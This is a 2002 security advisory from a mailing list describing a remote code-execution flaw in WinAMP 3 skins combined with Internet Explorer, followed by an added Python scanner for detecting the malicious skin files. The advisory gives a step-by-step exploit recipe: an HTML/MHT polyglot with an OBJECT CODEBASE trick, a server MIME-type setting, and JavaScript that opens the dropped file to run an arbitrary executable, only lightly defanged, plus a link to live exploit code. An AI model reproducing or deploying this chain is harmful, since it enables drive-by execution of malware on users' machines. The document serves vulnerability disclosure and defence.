[NT] WinAMP 3 Allows Execution of Arbitrary Code
From: support@securiteam.com Date: 08/19/02
From: support@securiteam.com To: list@securiteam.com Date: Mon, 19 Aug 2002 10:56:04 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
WinAMP 3 Allows Execution of Arbitrary Code
------------------------------------------------------------------------
SUMMARY
The new WinAMP 3 fails to address a serious arbitrary code execution
vulnerability when the program is combined with Internet Explorer. The
vulnerability allows a remote attacker to cause the program to execute
arbitrary code automatically without the need for user intervention.
DETAILS
Vulnerable systems:
* WinAMP 3
* WinAMP 2 (though this advisory was written for WinAMP 3, WinAMP 2 has a similar problem)
WinAMP 3 uses a new skinning system whose skin files carry the .wal extension. This skin type is opened automatically by MSIE (it does not prompt for download), and the skin is stored in a known location on the user's hard disk, namely:
C:\Program Files\Winamp3\Skins
(This is the default location given by the program)
Exploit:
A working exploit code is available at http://kuperus.xs4all.nl/WinAMP3.htm (NOTE: this is working exploit code; going to the link will cause WinAMP to run arbitrary code).
Note that this version of the exploit code does not rely on any MSIE hole to invoke the executable, so it will continue to work even after Microsoft patches its browser.
Recreation steps:
1) Create a directory c:\exploit
2) Place an EXE file in it (let us call it payload.exe), then create a file called exploit.htm with the following contents:
<html>
<body>
<img src="payload.exe">
</body>
</html>
3) Open the file in Internet Explorer, choose File > Save As, and save it as exploit.mht.
4) Open it in Notepad and add the following line to the top:
<html style="display:none;">
It should look like this:
<html style="display:none;">
From: <Saved by Microsoft Internet Explorer 5>
Subject:
Date: Mon, 5 Aug 2002 18:30:03 +0200
MIME-Version: 1.0
Then look for the body section of this HTML document (it looks a little mangled), delete everything between the body tags, and place an object tag in its place, so it looks like this:
<META content=3D"MSHTML 6.00.2716.2200" name=3DGENERATOR></HEAD>
<BODY>
<0BJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"
CODEBASE="mhtml:file:///C:/Program%20Files/WinAMP3/Skins/amp.wal!file:///c:/exploit/payload.exe"></0BJECT>
</BODY></HTML>
(To prevent execution, the O in OBJECT was replaced with a 0.)
This code will later be used to invoke our executable. What we have done is slightly alter the MHT file so that it can be viewed both as an HTML file and as an MHT file: files starting with an <html> tag are always treated as HTML files by Internet Explorer.
5) Now we want to place this file on the user's hard disk. We know WAL files are opened automatically by WinAMP 3 and placed in a known location, so we will rename our exploit.mht file to .wal. Unfortunately Internet Explorer disregards MIME types: because we added an <html> tag to the MHT file, it tries to open it as an HTML file. The only way Jelmer found around this is to serve the file with a MIME type MSIE does not know; Jelmer chose x-foo/x-bar. If you are using Apache, you can add the following line to your mime.types file:
x-foo/x-bar wal
This means that the web server will send this MIME type with every requested file ending in .wal. When we now request the file, it will be opened by WinAMP 3 and an error message will follow shortly. By then, however, it is already too late: our exploit.wal file has been placed in
C:\Program Files\WinAMP3\Skins\exploit.wal
Now all that remains is to bring it together by making the following sequence of events occur:
1. Download our exploit.wal.
2. Wait a few seconds for it to finish downloading, then call exploit.wal as an HTML file (the file also doubles as an MHT file, and the object tag included in the HTML portion points to itself as the codebase).
Here is the code for this:
<html>
<body>
Waiting for 5 seconds..
<!-- download our renamed mht file and place it on the users disk -->
<!frame src="amp.wal" style="display:none"></iframe>
<scr!pt language="javascript">
//wait for 5 seconds
setTimeout("ExecuteFile()",5000);
function ExecuteFile() {
// open the saved wal file as html file
// oddly when called from disk it didn't open it as html file so we need to force this behaviour by using a modeless dialog
sHTML = 'file:///C:/Program%20Files/WinAMP3/Skins/amp.wal';
sFeatures = 'dialogLeft: 0px; dialogTop: 0px; dialogWidth: 0px; dialogheight: 0px; status:no; unadorned:yes; help:no';
vReturnValue = window.showModelessDialog(sHTML, '', sFeatures)
}
</script>
</body>
</html>
(To prevent execution, the I was replaced with a !)
3. That should be it.
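A defender-side check, added here and not part of the advisory: it flags a .wal file in the Skins directory that is really the HTML/MHT polyglot described above (content begins with an <html> tag, carries MHT headers, and has an OBJECT CODEBASE pointing at an mhtml: URL). It assumes a genuine .wal skin is a ZIP archive; the sample bytes, CLSID and payload path are constructed placeholders.

```python
import os
import re

# Constructed sample modelled on the HTML/MHT polyglot the advisory describes;
# OBJECT is defanged with a digit zero as in the advisory, and the CLSID and
# payload path are placeholders rather than values taken from the page.
SAMPLE_POLYGLOT = (
    b'<html style="display:none;">\n'
    b"From: <Saved by Microsoft Internet Explorer 5>\n"
    b"MIME-Version: 1.0\n"
    b"Content-Type: text/html;\n\n"
    b'<BODY><0BJECT NAME="X" CLASSID="CLSID:PLACEHOLDER"\n'
    b'CODEBASE=3D"mhtml:file:///C:/Program%20Files/WinAMP3/Skins/amp.wal'
    b'!file:///c:/PLACEHOLDER/payload.exe"></0BJECT></BODY></HTML>\n'
)
# Constructed benign sample: a genuine .wal skin is assumed here to be a ZIP
# archive, so it begins with the local file header signature "PK\x03\x04".
SAMPLE_BENIGN = b"PK\x03\x04\x14\x00\x00\x00\x08\x00" + b"\x00" * 20 + b"skin.xml"

# IE treats content that begins with an <html> tag as HTML whatever MIME type it
# was served with; MHT headers and an mhtml: CODEBASE are the polyglot's other marks.
HTML_START = re.compile(rb"\s*<html[\s>]", re.IGNORECASE)
MIME_HEADER = re.compile(rb"^MIME-Version:", re.IGNORECASE | re.MULTILINE)
MHTML_CODEBASE = re.compile(rb'codebase\s*=(?:3D)?\s*"?\s*mhtml:', re.IGNORECASE)

def classify_wal(data: bytes) -> list:
    """Return the suspicious traits found in a .wal file's bytes (empty list = looks clean)."""
    findings = []
    if HTML_START.match(data):
        findings.append("starts-with-html-tag")
    if MIME_HEADER.search(data[:4096]):
        findings.append("mht-headers")
    if MHTML_CODEBASE.search(data):
        findings.append("mhtml-codebase")
    if not data.startswith(b"PK\x03\x04"):
        findings.append("not-zip-archive")
    return findings

def scan_skins_dir(path: str) -> dict:
    """Map each .wal file in path that has findings to its list of findings."""
    report = {}
    for name in os.listdir(path):
        full = os.path.join(path, name)
        if name.lower().endswith(".wal") and os.path.isfile(full):
            with open(full, "rb") as fh:
                hits = classify_wal(fh.read(1 << 20))
            if hits:
                report[full] = hits
    return report
```

Run scan_skins_dir against the Skins directory named in the advisory; any .wal reported with "starts-with-html-tag" should be treated as dropped browser content rather than a skin.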
ADDITIONAL INFORMATION
The information has been provided by Jelmer <mailto:jelmer@kuperus.xs4all.nl>.
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.